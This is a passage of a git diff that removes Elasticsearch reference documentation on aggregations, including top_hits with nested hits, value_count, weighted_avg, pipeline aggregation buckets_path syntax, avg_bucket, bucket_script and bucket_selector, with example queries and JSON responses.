TESTRESPONSE[s/AVnNBmatCQpcRyxw6ChH/$body.aggregations.top_tags.buckets.2.top_sales_hits.hits.hits.0._id/] - - -==== Field collapse example - -Field collapsing or result grouping is a feature that logically groups a result set into groups and per group returns -top documents. The ordering of the groups is determined by the relevancy of the first document in a group. In -Elasticsearch this can be implemented via a bucket aggregator that wraps a `top_hits` aggregator as sub-aggregator. - -In the example below we search across crawled webpages. For each webpage we store the body and the domain the webpage -belong to. By defining a `terms` aggregator on the `domain` field we group the result set of webpages by domain. The -`top_hits` aggregator is then defined as sub-aggregator, so that the top matching hits are collected per bucket. - -Also a `max` aggregator is defined which is used by the `terms` aggregator's order feature to return the buckets by -relevancy order of the most relevant document in a bucket. 
- -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "query": { - "match": { - "body": "elections" - } - }, - "aggs": { - "top_sites": { - "terms": { - "field": "domain", - "order": { - "top_hit": "desc" - } - }, - "aggs": { - "top_tags_hits": { - "top_hits": {} - }, - "top_hit" : { - "max": { - "script": { - "source": "_score" - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -At the moment the `max` (or `min`) aggregator is needed to make sure the buckets from the `terms` aggregator are -ordered according to the score of the most relevant webpage per domain. Unfortunately the `top_hits` aggregator -can't be used in the `order` option of the `terms` aggregator yet. - -==== top_hits support in a nested or reverse_nested aggregator - -If the `top_hits` aggregator is wrapped in a `nested` or `reverse_nested` aggregator then nested hits are being returned. -Nested hits are in a sense hidden mini documents that are part of regular document where in the mapping a nested field type -has been configured. The `top_hits` aggregator has the ability to un-hide these documents if it is wrapped in a `nested` -or `reverse_nested` aggregator. Read more about nested in the <>. - -If nested type has been configured a single document is actually indexed as multiple Lucene documents and they share -the same id. In order to determine the identity of a nested hit there is more needed than just the id, so that is why -nested hits also include their nested identity. The nested identity is kept under the `_nested` field in the search hit -and includes the array field and the offset in the array field the nested hit belongs to. The offset is zero based. - -Let's see how it works with a real sample. Considering the following mapping: - -[source,console] --------------------------------------------------- -PUT /sales -{ - "mappings": { - "properties": { - "tags": { "type": "keyword" }, - "comments": { <1> - "type": "nested", - "properties": { - "username": { "type": "keyword" }, - "comment": { "type": "text" } - } - } - } - } -} --------------------------------------------------- - -<1> The `comments` is an array that holds nested documents under the `product` object. - -And some documents: - -[source,console] --------------------------------------------------- -PUT /sales/_doc/1?refresh -{ - "tags": [ "car", "auto" ], - "comments": [ - { "username": "baddriver007", "comment": "This car could have better brakes" }, - { "username": "dr_who", "comment": "Where's the autopilot? 
Can't find it" }, - { "username": "ilovemotorbikes", "comment": "This car has two extra wheels" } - ] -} --------------------------------------------------- -// TEST[continued] - -It's now possible to execute the following `top_hits` aggregation (wrapped in a `nested` aggregation): - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "query": { - "term": { "tags": "car" } - }, - "aggs": { - "by_sale": { - "nested": { - "path": "comments" - }, - "aggs": { - "by_user": { - "terms": { - "field": "comments.username", - "size": 1 - }, - "aggs": { - "by_nested": { - "top_hits": {} - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] -// TEST[s/_search/_search\?filter_path=aggregations.by_sale.by_user.buckets/] - -Top hits response snippet with a nested hit, which resides in the first slot of array field `comments`: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "by_sale": { - "by_user": { - "buckets": [ - { - "key": "baddriver007", - "doc_count": 1, - "by_nested": { - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.3616575, - "hits": [ - { - "_index": "sales", - "_type" : "_doc", - "_id": "1", - "_nested": { - "field": "comments", <1> - "offset": 0 <2> - }, - "_score": 0.3616575, - "_source": { - "comment": "This car could have better brakes", <3> - "username": "baddriver007" - } - } - ] - } - } - } - ... - ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] - -<1> Name of the array field containing the nested hit -<2> Position if the nested hit in the containing array -<3> Source of the nested hit - -If `_source` is requested then just the part of the source of the nested object is returned, not the entire source of the document. -Also stored fields on the *nested* inner object level are accessible via `top_hits` aggregator residing in a `nested` or `reverse_nested` aggregator. - -Only nested hits will have a `_nested` field in the hit, non nested (regular) hits will not have a `_nested` field. - -The information in `_nested` can also be used to parse the original source somewhere else if `_source` isn't enabled. - -If there are multiple levels of nested object types defined in mappings then the `_nested` information can also be hierarchical -in order to express the identity of nested hits that are two layers deep or more. - -In the example below a nested hit resides in the first slot of the field `nested_grand_child_field` which then resides in -the second slow of the `nested_child_field` field: - -[source,js] --------------------------------------------------- -... -"hits": { - "total" : { - "value": 2565, - "relation": "eq" - }, - "max_score": 1, - "hits": [ - { - "_index": "a", - "_type": "b", - "_id": "1", - "_score": 1, - "_nested" : { - "field" : "nested_child_field", - "offset" : 1, - "_nested" : { - "field" : "nested_grand_child_field", - "offset" : 0 - } - } - "_source": ... - }, - ... - ] -} -... 
--------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/aggregations/metrics/valuecount-aggregation.asciidoc b/docs/reference/aggregations/metrics/valuecount-aggregation.asciidoc deleted file mode 100644 index 8895ecae60c..00000000000 --- a/docs/reference/aggregations/metrics/valuecount-aggregation.asciidoc +++ /dev/null @@ -1,142 +0,0 @@ -[[search-aggregations-metrics-valuecount-aggregation]] -=== Value count aggregation -++++ -Value count -++++ - -A `single-value` metrics aggregation that counts the number of values that are extracted from the aggregated documents. -These values can be extracted either from specific fields in the documents, or be generated by a provided script. Typically, -this aggregator will be used in conjunction with other single-value aggregations. For example, when computing the `avg` -one might be interested in the number of values the average is computed over. - -`value_count` does not de-duplicate values, so even if a field has duplicates (or a script generates multiple -identical values for a single document), each value will be counted individually. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs" : { - "types_count" : { "value_count" : { "field" : "type" } } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "types_count": { - "value": 7 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -The name of the aggregation (`types_count` above) also serves as the key by which the aggregation result can be -retrieved from the returned response. - -==== Script - -Counting the values generated by a script: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "type_count": { - "value_count": { - "script": { - "source": "doc['type'].value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "types_count": { - "value_count": { - "script": { - "id": "my_script", - "params": { - "field": "type" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales,stored_example_script] - -NOTE:: Because `value_count` is designed to work with any field it internally treats all values as simple bytes. -Due to this implementation, if `_value` script variable is used to fetch a value instead of accessing the field -directly (e.g. a "value script"), the field value will be returned as a string instead of it's native format. - -[[search-aggregations-metrics-valuecount-aggregation-histogram-fields]] -==== Histogram fields -When the `value_count` aggregation is computed on <>, the result of the aggregation is the sum of all numbers -in the `counts` array of the histogram. 
- -For example, for the following index that stores pre-aggregated histograms with latency metrics for different networks: - -[source,console] --------------------------------------------------- -PUT metrics_index/_doc/1 -{ - "network.name" : "net-1", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], - "counts" : [3, 7, 23, 12, 6] <1> - } -} - -PUT metrics_index/_doc/2 -{ - "network.name" : "net-2", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], - "counts" : [8, 17, 8, 7, 6] <1> - } -} - -POST /metrics_index/_search?size=0 -{ - "aggs": { - "total_requests": { - "value_count": { "field": "latency_histo" } - } - } -} --------------------------------------------------- - -For each histogram field the `value_count` aggregation will sum all numbers in the `counts` array <1>. -Eventually, it will add all values for all histograms and return the following result: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "total_requests": { - "value": 97 - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:test not setup] diff --git a/docs/reference/aggregations/metrics/weighted-avg-aggregation.asciidoc b/docs/reference/aggregations/metrics/weighted-avg-aggregation.asciidoc deleted file mode 100644 index 6cc02b38dcb..00000000000 --- a/docs/reference/aggregations/metrics/weighted-avg-aggregation.asciidoc +++ /dev/null @@ -1,207 +0,0 @@ -[[search-aggregations-metrics-weight-avg-aggregation]] -=== Weighted avg aggregation -++++ -Weighted avg -++++ - -A `single-value` metrics aggregation that computes the weighted average of numeric values that are extracted from the aggregated documents. -These values can be extracted either from specific numeric fields in the documents. - -When calculating a regular average, each datapoint has an equal "weight" ... it contributes equally to the final value. Weighted averages, -on the other hand, weight each datapoint differently. The amount that each datapoint contributes to the final value is extracted from the -document, or provided by a script. - -As a formula, a weighted average is the `∑(value * weight) / ∑(weight)` - -A regular average can be thought of as a weighted average where every value has an implicit weight of `1`. - -[[weighted-avg-params]] -.`weighted_avg` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`value` | The configuration for the field or script that provides the values |Required | -|`weight` | The configuration for the field or script that provides the weights |Required | -|`format` | The numeric response formatter |Optional | -|`value_type` | A hint about the values for pure scripts or unmapped fields |Optional | -|=== - -The `value` and `weight` objects have per-field specific configuration: - -[[value-params]] -.`value` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`field` | The field that values should be extracted from |Required | -|`missing` | A value to use if the field is missing entirely |Optional | -|`script` | A script which provides the values for the document. 
This is mutually exclusive with `field` |Optional -|=== - -[[weight-params]] -.`weight` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`field` | The field that weights should be extracted from |Required | -|`missing` | A weight to use if the field is missing entirely |Optional | -|`script` | A script which provides the weights for the document. This is mutually exclusive with `field` |Optional -|=== - - -==== Examples - -If our documents have a `"grade"` field that holds a 0-100 numeric score, and a `"weight"` field which holds an arbitrary numeric weight, -we can calculate the weighted average using: - -[source,console] --------------------------------------------------- -POST /exams/_search -{ - "size": 0, - "aggs": { - "weighted_grade": { - "weighted_avg": { - "value": { - "field": "grade" - }, - "weight": { - "field": "weight" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -Which yields a response like: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "weighted_grade": { - "value": 70.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - - -While multiple values-per-field are allowed, only one weight is allowed. If the aggregation encounters -a document that has more than one weight (e.g. the weight field is a multi-valued field) it will throw an exception. -If you have this situation, you will need to specify a `script` for the weight field, and use the script -to combine the multiple values into a single value to be used. - -This single weight will be applied independently to each value extracted from the `value` field. - -This example show how a single document with multiple values will be averaged with a single weight: - -[source,console] --------------------------------------------------- -POST /exams/_doc?refresh -{ - "grade": [1, 2, 3], - "weight": 2 -} - -POST /exams/_search -{ - "size": 0, - "aggs": { - "weighted_grade": { - "weighted_avg": { - "value": { - "field": "grade" - }, - "weight": { - "field": "weight" - } - } - } - } -} --------------------------------------------------- -// TEST - -The three values (`1`, `2`, and `3`) will be included as independent values, all with the weight of `2`: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "weighted_grade": { - "value": 2.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -The aggregation returns `2.0` as the result, which matches what we would expect when calculating by hand: -`((1*2) + (2*2) + (3*2)) / (2+2+2) == 2` - -==== Script - -Both the value and the weight can be derived from a script, instead of a field. 
As a simple example, the following -will add one to the grade and weight in the document using a script: - -[source,console] --------------------------------------------------- -POST /exams/_search -{ - "size": 0, - "aggs": { - "weighted_grade": { - "weighted_avg": { - "value": { - "script": "doc.grade.value + 1" - }, - "weight": { - "script": "doc.weight.value + 1" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - - -==== Missing values - -The `missing` parameter defines how documents that are missing a value should be treated. -The default behavior is different for `value` and `weight`: - -By default, if the `value` field is missing the document is ignored and the aggregation moves on to the next document. -If the `weight` field is missing, it is assumed to have a weight of `1` (like a normal average). - -Both of these defaults can be overridden with the `missing` parameter: - -[source,console] --------------------------------------------------- -POST /exams/_search -{ - "size": 0, - "aggs": { - "weighted_grade": { - "weighted_avg": { - "value": { - "field": "grade", - "missing": 2 - }, - "weight": { - "field": "weight", - "missing": 3 - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - diff --git a/docs/reference/aggregations/pipeline.asciidoc b/docs/reference/aggregations/pipeline.asciidoc deleted file mode 100644 index b24a3080886..00000000000 --- a/docs/reference/aggregations/pipeline.asciidoc +++ /dev/null @@ -1,307 +0,0 @@ -[[search-aggregations-pipeline]] - -== Pipeline aggregations - -Pipeline aggregations work on the outputs produced from other aggregations rather than from document sets, adding -information to the output tree. There are many different types of pipeline aggregation, each computing different information from -other aggregations, but these types can be broken down into two families: - -_Parent_:: - A family of pipeline aggregations that is provided with the output of its parent aggregation and is able - to compute new buckets or new aggregations to add to existing buckets. - -_Sibling_:: - Pipeline aggregations that are provided with the output of a sibling aggregation and are able to compute a - new aggregation which will be at the same level as the sibling aggregation. - -Pipeline aggregations can reference the aggregations they need to perform their computation by using the `buckets_path` -parameter to indicate the paths to the required metrics. The syntax for defining these paths can be found in the -<> section below. - -Pipeline aggregations cannot have sub-aggregations but depending on the type it can reference another pipeline in the `buckets_path` -allowing pipeline aggregations to be chained. For example, you can chain together two derivatives to calculate the second derivative -(i.e. a derivative of a derivative). - -NOTE: Because pipeline aggregations only add to the output, when chaining pipeline aggregations the output of each pipeline aggregation -will be included in the final output. - -[[buckets-path-syntax]] -[discrete] -=== `buckets_path` Syntax - -Most pipeline aggregations require another aggregation as their input. The input aggregation is defined via the `buckets_path` -parameter, which follows a specific format: - -// https://en.wikipedia.org/wiki/Extended_Backus%E2%80%93Naur_Form -[source,ebnf] --------------------------------------------------- -AGG_SEPARATOR = `>` ; -METRIC_SEPARATOR = `.` ; -AGG_NAME = ; -METRIC = ; -MULTIBUCKET_KEY = `[]` -PATH = ? 
(, )* ( , ) ; --------------------------------------------------- - -For example, the path `"my_bucket>my_stats.avg"` will path to the `avg` value in the `"my_stats"` metric, which is -contained in the `"my_bucket"` bucket aggregation. - -Paths are relative from the position of the pipeline aggregation; they are not absolute paths, and the path cannot go back "up" the -aggregation tree. For example, this moving average is embedded inside a date_histogram and refers to a "sibling" -metric `"the_sum"`: - -[source,console] --------------------------------------------------- -POST /_search -{ - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "timestamp", - "calendar_interval": "day" - }, - "aggs": { - "the_sum": { - "sum": { "field": "lemmings" } <1> - }, - "the_movavg": { - "moving_avg": { "buckets_path": "the_sum" } <2> - } - } - } - } -} --------------------------------------------------- -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -<1> The metric is called `"the_sum"` -<2> The `buckets_path` refers to the metric via a relative path `"the_sum"` - -`buckets_path` is also used for Sibling pipeline aggregations, where the aggregation is "next" to a series of buckets -instead of embedded "inside" them. For example, the `max_bucket` aggregation uses the `buckets_path` to specify -a metric embedded inside a sibling aggregation: - -[source,console] --------------------------------------------------- -POST /_search -{ - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "max_monthly_sales": { - "max_bucket": { - "buckets_path": "sales_per_month>sales" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` instructs this max_bucket aggregation that we want the maximum value of the `sales` aggregation in the -`sales_per_month` date histogram. - -If a Sibling pipeline agg references a multi-bucket aggregation, such as a `terms` agg, it also has the option to -select specific keys from the multi-bucket. For example, a `bucket_script` could select two specific buckets (via -their bucket keys) to perform the calculation: - -[source,console] --------------------------------------------------- -POST /_search -{ - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sale_type": { - "terms": { - "field": "type" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "hat_vs_bag_ratio": { - "bucket_script": { - "buckets_path": { - "hats": "sale_type['hat']>sales", <1> - "bags": "sale_type['bag']>sales" <1> - }, - "script": "params.hats / params.bags" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` selects the hats and bags buckets (via `['hat']`/`['bag']``) to use in the script specifically, -instead of fetching all the buckets from `sale_type` aggregation - -[discrete] -=== Special Paths - -Instead of pathing to a metric, `buckets_path` can use a special `"_count"` path. This instructs -the pipeline aggregation to use the document count as its input. 
For example, a moving average can be calculated on the document count of each bucket, instead of a specific metric: - -[source,console] --------------------------------------------------- -POST /_search -{ - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "timestamp", - "calendar_interval": "day" - }, - "aggs": { - "the_movavg": { - "moving_avg": { "buckets_path": "_count" } <1> - } - } - } - } -} --------------------------------------------------- -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -<1> By using `_count` instead of a metric name, we can calculate the moving average of document counts in the histogram - -The `buckets_path` can also use `"_bucket_count"` and path to a multi-bucket aggregation to use the number of buckets -returned by that aggregation in the pipeline aggregation instead of a metric. for example a `bucket_selector` can be -used here to filter out buckets which contain no buckets for an inner terms aggregation: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "day" - }, - "aggs": { - "categories": { - "terms": { - "field": "category" - } - }, - "min_bucket_selector": { - "bucket_selector": { - "buckets_path": { - "count": "categories._bucket_count" <1> - }, - "script": { - "source": "params.count != 0" - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> By using `_bucket_count` instead of a metric name, we can filter out `histo` buckets where they contain no buckets -for the `categories` aggregation - -[[dots-in-agg-names]] -[discrete] -=== Dealing with dots in agg names - -An alternate syntax is supported to cope with aggregations or metrics which -have dots in the name, such as the ++99.9++th -<>. This metric -may be referred to as: - -[source,js] ---------------- -"buckets_path": "my_percentile[99.9]" ---------------- -// NOTCONSOLE - -[[gap-policy]] -[discrete] -=== Dealing with gaps in the data - -Data in the real world is often noisy and sometimes contains *gaps* -- places where data simply doesn't exist. This can -occur for a variety of reasons, the most common being: - -* Documents falling into a bucket do not contain a required field -* There are no documents matching the query for one or more buckets -* The metric being calculated is unable to generate a value, likely because another dependent bucket is missing a value. -Some pipeline aggregations have specific requirements that must be met (e.g. a derivative cannot calculate a metric for the -first value because there is no previous value, HoltWinters moving average need "warmup" data to begin calculating, etc) - -Gap policies are a mechanism to inform the pipeline aggregation about the desired behavior when "gappy" or missing -data is encountered. All pipeline aggregations accept the `gap_policy` parameter. There are currently two gap policies -to choose from: - -_skip_:: - This option treats missing data as if the bucket does not exist. It will skip the bucket and continue - calculating using the next available value. - -_insert_zeros_:: - This option will replace missing values with a zero (`0`) and pipeline aggregation computation will - proceed as normal. 
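As a minimal sketch of where the parameter goes (the aggregation and path names are placeholders, not tied to any particular index), a gap policy is set directly on the pipeline aggregation, next to its `buckets_path`:

[source,js]
--------------------------------------------------
{
  "the_deriv": {
    "derivative": {
      "buckets_path": "the_sum",
      "gap_policy": "insert_zeros" <1>
    }
  }
}
--------------------------------------------------
// NOTCONSOLE
<1> Missing buckets are treated as `0` instead of being skipped.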
- -include::pipeline/avg-bucket-aggregation.asciidoc[] - -include::pipeline/bucket-script-aggregation.asciidoc[] - -include::pipeline/bucket-selector-aggregation.asciidoc[] - -include::pipeline/bucket-sort-aggregation.asciidoc[] - -include::pipeline/cumulative-cardinality-aggregation.asciidoc[] - -include::pipeline/cumulative-sum-aggregation.asciidoc[] - -include::pipeline/derivative-aggregation.asciidoc[] - -include::pipeline/extended-stats-bucket-aggregation.asciidoc[] - -include::pipeline/inference-bucket-aggregation.asciidoc[] - -include::pipeline/max-bucket-aggregation.asciidoc[] - -include::pipeline/min-bucket-aggregation.asciidoc[] - -include::pipeline/movavg-aggregation.asciidoc[] - -include::pipeline/movfn-aggregation.asciidoc[] - -include::pipeline/moving-percentiles-aggregation.asciidoc[] - -include::pipeline/normalize-aggregation.asciidoc[] - -include::pipeline/percentiles-bucket-aggregation.asciidoc[] - -include::pipeline/serial-diff-aggregation.asciidoc[] - -include::pipeline/stats-bucket-aggregation.asciidoc[] - -include::pipeline/sum-bucket-aggregation.asciidoc[] diff --git a/docs/reference/aggregations/pipeline/avg-bucket-aggregation.asciidoc b/docs/reference/aggregations/pipeline/avg-bucket-aggregation.asciidoc deleted file mode 100644 index 27ad8fbbe5e..00000000000 --- a/docs/reference/aggregations/pipeline/avg-bucket-aggregation.asciidoc +++ /dev/null @@ -1,118 +0,0 @@ -[[search-aggregations-pipeline-avg-bucket-aggregation]] -=== Avg bucket aggregation -++++ -Avg bucket -++++ - -A sibling pipeline aggregation which calculates the (mean) average value of a specified metric in a sibling aggregation. -The specified metric must be numeric and the sibling aggregation must be a multi-bucket aggregation. - -[[avg-bucket-agg-syntax]] -==== Syntax - -An `avg_bucket` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "avg_bucket": { - "buckets_path": "the_sum" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[avg-bucket-params]] -.`avg_bucket` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to find the average for (see <> for more - details) |Required | - |`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details) |Optional |`skip` - |`format` |format to apply to the output value of this aggregation |Optional | `null` -|=== - -The following snippet calculates the average of the total monthly `sales`: - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "avg_monthly_sales": { - "avg_bucket": { - "buckets_path": "sales_per_month>sales" <1> - } - } - } -} - --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` instructs this avg_bucket aggregation that we want the (mean) average value of the `sales` aggregation in the -`sales_per_month` date histogram. 
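As a quick sanity check, the three monthly sums produced by this setup are 550, 60 and 375, so the expected bucket average is `(550 + 60 + 375) / 3`, which is approximately 328.33.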
- -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - } - } - ] - }, - "avg_monthly_sales": { - "value": 328.33333333333333 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/aggregations/pipeline/bucket-script-aggregation.asciidoc b/docs/reference/aggregations/pipeline/bucket-script-aggregation.asciidoc deleted file mode 100644 index 508f0389ca5..00000000000 --- a/docs/reference/aggregations/pipeline/bucket-script-aggregation.asciidoc +++ /dev/null @@ -1,164 +0,0 @@ -[[search-aggregations-pipeline-bucket-script-aggregation]] -=== Bucket script aggregation -++++ -Bucket script -++++ - -A parent pipeline aggregation which executes a script which can perform per bucket computations on specified metrics -in the parent multi-bucket aggregation. The specified metric must be numeric and the script must return a numeric value. - -[[bucket-script-agg-syntax]] -==== Syntax - -A `bucket_script` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "bucket_script": { - "buckets_path": { - "my_var1": "the_sum", <1> - "my_var2": "the_value_count" - }, - "script": "params.my_var1 / params.my_var2" - } -} --------------------------------------------------- -// NOTCONSOLE -<1> Here, `my_var1` is the name of the variable for this buckets path to use in the script, `the_sum` is the path to -the metrics to use for that variable. - -[[bucket-script-params]] -.`bucket_script` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`script` |The script to run for this aggregation. The script can be inline, file or indexed. 
(see <> -for more details) |Required | -|`buckets_path` |A map of script variables and their associated path to the buckets we wish to use for the variable -(see <> for more details) |Required | -|`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional |`skip` -|`format` |format to apply to the output value of this aggregation |Optional |`null` -|=== - -The following snippet calculates the ratio percentage of t-shirt sales compared to total sales each month: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "total_sales": { - "sum": { - "field": "price" - } - }, - "t-shirts": { - "filter": { - "term": { - "type": "t-shirt" - } - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "t-shirt-percentage": { - "bucket_script": { - "buckets_path": { - "tShirtSales": "t-shirts>sales", - "totalSales": "total_sales" - }, - "script": "params.tShirtSales / params.totalSales * 100" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "total_sales": { - "value": 550.0 - }, - "t-shirts": { - "doc_count": 1, - "sales": { - "value": 200.0 - } - }, - "t-shirt-percentage": { - "value": 36.36363636363637 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "total_sales": { - "value": 60.0 - }, - "t-shirts": { - "doc_count": 1, - "sales": { - "value": 10.0 - } - }, - "t-shirt-percentage": { - "value": 16.666666666666664 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "total_sales": { - "value": 375.0 - }, - "t-shirts": { - "doc_count": 1, - "sales": { - "value": 175.0 - } - }, - "t-shirt-percentage": { - "value": 46.666666666666664 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/aggregations/pipeline/bucket-selector-aggregation.asciidoc b/docs/reference/aggregations/pipeline/bucket-selector-aggregation.asciidoc deleted file mode 100644 index 569115e2bfe..00000000000 --- a/docs/reference/aggregations/pipeline/bucket-selector-aggregation.asciidoc +++ /dev/null @@ -1,119 +0,0 @@ -[[search-aggregations-pipeline-bucket-selector-aggregation]] -=== Bucket selector aggregation -++++ -Bucket selector -++++ - -A parent pipeline aggregation which executes a script which determines whether the current bucket will be retained -in the parent multi-bucket aggregation. The specified metric must be numeric and the script must return a boolean value. -If the script language is `expression` then a numeric return value is permitted. In this case 0.0 will be evaluated as `false` -and all other values will evaluate to true. - -NOTE: The bucket_selector aggregation, like all pipeline aggregations, executes after all other sibling aggregations. 
This means that -using the bucket_selector aggregation to filter the returned buckets in the response does not save on execution time running the aggregations. - -==== Syntax - -A `bucket_selector` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "bucket_selector": { - "buckets_path": { - "my_var1": "the_sum", <1> - "my_var2": "the_value_count" - }, - "script": "params.my_var1 > params.my_var2" - } -} --------------------------------------------------- -// NOTCONSOLE -<1> Here, `my_var1` is the name of the variable for this buckets path to use in the script, `the_sum` is the path to -the metrics to use for that variable. - -[[bucket-selector-params]] -.`bucket_selector` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`script` |The script to run for this aggregation. The script can be inline, file or indexed. (see <> -for more details) |Required | -|`buckets_path` |A map of script variables and their associated path to the buckets we wish to use for the variable -(see <> for more details) |Required | -|`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional |`skip` -|=== - -The following snippet only retains buckets where the total sales for the month is more than 200: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "total_sales": { - "sum": { - "field": "price" - } - }, - "sales_bucket_filter": { - "bucket_selector": { - "buckets_path": { - "totalSales": "total_sales" - }, - "script": "params.totalSales > 200" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "total_sales": { - "value": 550.0 - } - },<1> - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "total_sales": { - "value": 375.0 - }, - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -<1> Bucket for `2015/02/01 00:00:00` has been removed as its total sales was less than 200 diff --git a/docs/reference/aggregations/pipeline/bucket-sort-aggregation.asciidoc b/docs/reference/aggregations/pipeline/bucket-sort-aggregation.asciidoc deleted file mode 100644 index 69eef2e85b5..00000000000 --- a/docs/reference/aggregations/pipeline/bucket-sort-aggregation.asciidoc +++ 